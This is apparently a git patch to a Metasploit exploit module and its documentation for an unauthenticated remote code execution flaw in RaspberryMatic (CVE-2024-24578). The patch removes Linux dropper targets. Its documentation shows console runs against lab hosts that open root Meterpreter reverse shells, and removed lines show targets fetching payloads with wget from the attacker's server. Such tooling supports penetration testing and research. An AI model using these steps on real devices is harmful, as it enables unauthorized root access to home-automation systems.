From d3e41f583cfbeadfd93b59153d49905937be8d94 Mon Sep 17 00:00:00 2001
From: h00die-gr3y <h00die.gr3y@gmail.com>
Date: Mon, 3 Feb 2025 17:54:45 +0000
Subject: [PATCH] removed linux dropper code and tested with PR 19850

---
 ...aspberrymatic_unauth_rce_cve_2024_24578.md | 47 ++++---------------
 ...aspberrymatic_unauth_rce_cve_2024_24578.rb | 30 +-----------
 2 files changed, 9 insertions(+), 68 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md b/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md
index f12ae5b04d7a..4ee4d7e985b3 100644
--- a/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md
+++ b/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md
@@ -35,7 +35,7 @@ You are now ready to test the module.
 - [ ] `set rhosts <ip-target>`
 - [ ] `set rport <port>`
 - [ ] `set lhost <attacker-ip>`
-- [ ] `set target <0=Unix/Linux Command, 1=Linux Dropper (ARM), 2=Linux Dropper (x86_64)>`
+- [ ] `set target <0=Unix/Linux Command>`
 - [ ] `exploit`
 - [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
 
@@ -43,7 +43,7 @@ You are now ready to test the module.
 No specific options defined.
 
 ## Scenarios
-### RaspberryMatic OVA appliance - Unix/Linux Command target
+### RaspberryMatic OVA appliance - Unix/Linux Command x64 target
 ```msf
 msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
 rhosts => 192.168.201.6
@@ -76,10 +76,10 @@ meterpreter > pwd
 /root
 meterpreter >
 ```
-### RaspberryMatic Pi4 Model B compute board - Linux Dropper (ARM) Command target
+### RaspberryMatic Pi4 Model B compute board - Unix/Linux Command aarch64 target
 ```msf
-msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 1
-target => 1
+msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set payload cmd/linux/http/aarch64/meterpreter_reverse_tcp
+payload => cmd/linux/http/aarch64/meterpreter_reverse_tcp
 msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.10
 rhosts => 192.168.201.10
 msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
@@ -88,17 +88,11 @@ msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.201.10:443 can be exploited.
 [+] The target appears to be vulnerable. RaspberryMatic 3.65.8
-[*] Executing Linux Dropper (ARM support) for linux/aarch64/meterpreter_reverse_tcp
-[*] Using URL: http://192.168.201.8:8080/4h2lPduH4
-[*] Uploading Aarv1CEc.tgz
+[*] Executing Unix/Linux Command for cmd/linux/http/aarch64/meterpreter_reverse_tcp
+[*] Uploading 8emVtVt6U.tgz
 [*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
-[*] Command Stager progress - 100.00% done (115/115 bytes)
-[*] Client 192.168.201.10 (Wget/1.21.3) requested /4h2lPduH4
-[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
 [*] Restoring original watchdog script.
-[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:34866) at 2025-01-28 18:10:01 +0000
-[*] Server stopped.
-
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:40324) at 2025-02-03 17:40:01 +0000
 meterpreter > sysinfo
 Computer     : 192.168.201.10
 OS           :  (Linux 5.15.56)
@@ -109,31 +103,6 @@ meterpreter > getuid
 Server username: root
 meterpreter > pwd
 /root
-meterpreter >
-```
-### RaspberryMatic OVA appliance - Linux Dropper (x86_64) Command target
-```msf
-msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 2
-target => 2
-msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
-rhosts => 192.168.201.6
-msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
-[*] Reloading module...
-[*] Started reverse TCP handler on 192.168.201.8:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if 192.168.201.6:443 can be exploited.
-[+] The target appears to be vulnerable. RaspberryMatic 3.73.9
-[*] Executing Linux Dropper (x86_64 support) for linux/x64/meterpreter_reverse_tcp
-[*] Using URL: http://192.168.201.8:8080/8OlmzeRoa
-[*] Uploading kovy0xZ9M.tgz
-[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
-[*] Command Stager progress - 100.00% done (115/115 bytes)
-[*] Client 192.168.201.6 (Wget/1.21.4) requested /8OlmzeRoa
-[*] Sending payload to 192.168.201.6 (Wget/1.21.4)
-[*] Restoring original watchdog script.
-[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.6:55920) at 2025-01-30 22:25:02 +0000
-[*] Server stopped.
-
 meterpreter >
 ```
 ## Limitations
diff --git a/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb b/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb
index fe7a4434f692..7e0543d15d00 100644
--- a/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb
+++ b/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb
@@ -7,8 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
-  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -43,7 +41,7 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2024-03-16',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Targets' => [
           [
@@ -53,30 +51,6 @@ def initialize(info = {})
               'Arch' => [ARCH_CMD],
               'Type' => :unix_cmd
             }
-          ],
-          [
-            'Linux Dropper (ARM support)',
-            {
-              'Platform' => ['linux'],
-              'Arch' => [ARCH_AARCH64, ARCH_ARMLE],
-              'Type' => :linux_dropper,
-              'CmdStagerFlavor' => ['wget', 'curl'],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/aarch64/meterpreter_reverse_tcp'
-              }
-            }
-          ],
-          [
-            'Linux Dropper (x86_64 support)',
-            {
-              'Platform' => ['linux'],
-              'Arch' => [ARCH_X64],
-              'Type' => :linux_dropper,
-              'CmdStagerFlavor' => ['wget', 'curl'],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
-              }
-            }
           ]
         ],
         'DefaultTarget' => 0,
@@ -191,8 +165,6 @@ def exploit
     case target['Type']
     when :unix_cmd
       execute_command(payload.encoded)
-    when :linux_dropper
-      execute_cmdstager
     end
   end
 end